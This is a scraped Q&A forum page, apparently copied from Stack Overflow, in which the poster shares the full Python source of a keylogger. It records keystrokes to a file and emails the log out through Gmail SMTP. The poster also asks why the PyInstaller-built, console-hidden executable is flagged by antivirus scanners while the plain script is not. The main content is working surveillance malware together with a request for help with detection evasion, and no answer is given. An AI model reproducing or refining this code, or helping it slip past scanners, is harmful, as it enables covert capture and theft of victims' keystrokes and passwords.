Welcome to OGeek Q&A Community for programmer and developer-Open, Learning and Share
Welcome To Ask or Share your Answers For Others

Categories

0 votes
323 views
in Technique[技术] by (71.8m points)

compilation - Python compiled with pyinstaller makes the program be seen as malicious?

I have been experimenting with keyloggers and the ability to send a log file over email. My python program file is not detected as malicious by any file scanner. Here is the hash for VirusTotal : 846d0202bf71c7d62347b51a38c080e70a34d39d936a5bb36c3f76775f39693c

Here is the code.

from pynput.keyboard import Listener
import smtplib
import mimetypes
from email.message import EmailMessage
import time 
def log_keystroke(key):
    key = str(key).replace("'", "")
    if key == 'Key.space':
        key = ' '
    if key == 'Key.shift_r':
        key = ''
    if key == "Key.enter":
        key = '
'
    with open("log.txt", 'a') as f:
        f.write(key)
with Listener(on_press=log_keystroke) as l:
    l.join()
while True:
    time.sleep(600)
    a()
def a():
    message = EmailMessage()
    message['From'] = "email@gmail.com"
    message['To'] = "email@gmail.com"
    message['Subject'] = 'Log'
    body = """Log"""
    message.set_content(body)
    mime_type, _ = mimetypes.guess_type('log.txt')
    mime_type, mime_subtype = mime_type.split('/')
    with open('log.txt', 'rb') as file:
        message.add_attachment(file.read(),
        maintype=mime_type,
        subtype=mime_subtype,
        filename='log.txt')
        print(message)
        mail_server = smtplib.SMTP_SSL('smtp.gmail.com')
        mail_server.set_debuglevel(1)
        mail_server.login("email@email.com", 'password_example')
        mail_server.send_message(message)
        mail_server.quit()

However , after compiling it with pyinstaller , the .exe is seen as malicious by some trackers. Note that I have given it an icon image , so that cant be the problem. Here is the hash for the compiled exe: 210c6bd1869903ebdbb693fd7b9e62db548513c0750132466a3417a59b16139e

I used pyinstaller --noconsole --onefile even with directory it is still tracked by some. I understand that keyloggers are malicious but since it wasnt tracked as a python file there should be a problem with the compiling?If anyone knows about this or has encountered this before , please let me know. Thanks 0x

question from:https://stackoverflow.com/questions/66049908/python-compiled-with-pyinstaller-makes-the-program-be-seen-as-malicious

与恶龙缠斗过久,自身亦成为恶龙;凝视深渊过久,深渊将回以凝视…
Welcome To Ask or Share your Answers For Others

1 Reply

0 votes
by (71.8m points)
Waitting for answers

与恶龙缠斗过久,自身亦成为恶龙;凝视深渊过久,深渊将回以凝视…
OGeek|极客中国-欢迎来到极客的世界,一个免费开放的程序员编程交流平台!开放,进步,分享!让技术改变生活,让极客改变未来! Welcome to OGeek Q&A Community for programmer and developer-Open, Learning and Share
Click Here to Ask a Question

...